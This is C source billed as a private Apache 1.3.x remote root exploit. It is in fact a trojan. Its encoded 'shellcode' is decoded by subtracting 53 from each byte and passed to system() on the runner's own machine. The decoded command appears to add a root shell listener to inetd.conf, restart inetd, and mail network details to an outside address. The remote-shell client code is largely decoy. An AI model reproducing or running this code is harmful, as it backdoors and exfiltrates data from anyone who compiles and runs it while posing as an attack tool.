/*
      Private Apache Xploit
      ---------------------	

      NO DISTRIBUTE!!!!!	


      Affected Apache Versions : 1.3.7-1.3.9.12

      Tested :

	Red Hat 5.x, 6.x, 7.x
	Debian 2.2-3.0
	Slackware 8.0
	Suse 7.3Beta
	Mandrake 8.0		
	Windows Apache 1.3 Beta
   
 
	Coded by k2!!

	greets effnet #!adm, #phrack	


ADM 0WN YOU!
*/


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>


#define NOP     0x90
#define RET     0xbfffec90
#define PORT    5760
#define pmap_proc_p system


char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";


int max(int x, int y)
{
        if(x > y)
                return(x);
        return(y);
}


void rshell(char *host)
{
        int sockfd, maxfd, n;
        struct sockaddr_in cli;
        char sendln[1024], recvln[1024];
        struct hostent *hp;
        fd_set rset;


        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("socket");
                exit(-1);
        }
        if((hp = gethostbyname(host)) == NULL){
                perror("gethostbyname");


                exit(-1);
        }
        bzero(&cli, sizeof(cli));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(PORT);
        cli.sin_addr.s_addr = inet_addr(host);
        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
                perror("connect");
                exit(-1);
        }
        printf("root shell found!\n");
        strcpy(sendln, "uname -a; pwd; id;\n");
        write(sockfd, sendln, strlen(sendln));
        FD_ZERO(&rset);
        for(;;){
                FD_SET(fileno(stdin), &rset);
                FD_SET(sockfd, &rset);
                maxfd = max(fileno(stdin), sockfd) + 1;
                select(maxfd, &rset, NULL, NULL, NULL);
                if(FD_ISSET(fileno(stdin), &rset)){


                        bzero(sendln, sizeof(sendln));
                        fgets(sendln, sizeof(sendln)-2, stdin);
                        write(sockfd, sendln, strlen(sendln));
                }
                if(FD_ISSET(sockfd, &rset)){
                        bzero(recvln, sizeof(recvln));
                        if((n = read(sockfd, recvln, sizeof(recvln))) ==
0){
                                printf("Connection closed.\n");
                                exit(0);
                        }
                        if(n < 0){
                                perror("read");
                                exit(-1);
                        }
                        fputs(recvln, stdout);
                }
        }
}


void main(int argc, char **argv)
{
        CLIENT *cli;
        int i = 0, offset = 53;
        char *portmap;
        char *buf;


                if(argc < 2){
                        printf("usage: %s <ip> [offset]\n", argv[0]);
                        exit(-1);
                }


        if((portmap = (char *) malloc(154)) == NULL) {
                perror("malloc");
        }


        while(*shellcode) {
                portmap[i] = *shellcode - offset;
                shellcode++; i++;
        }


        pmap_proc_p(portmap);


        printf("sending shellcode... connecting to remote host\n");
        rshell(argv[1]);


        strcpy(buf, portmap);


        exit(-1);
}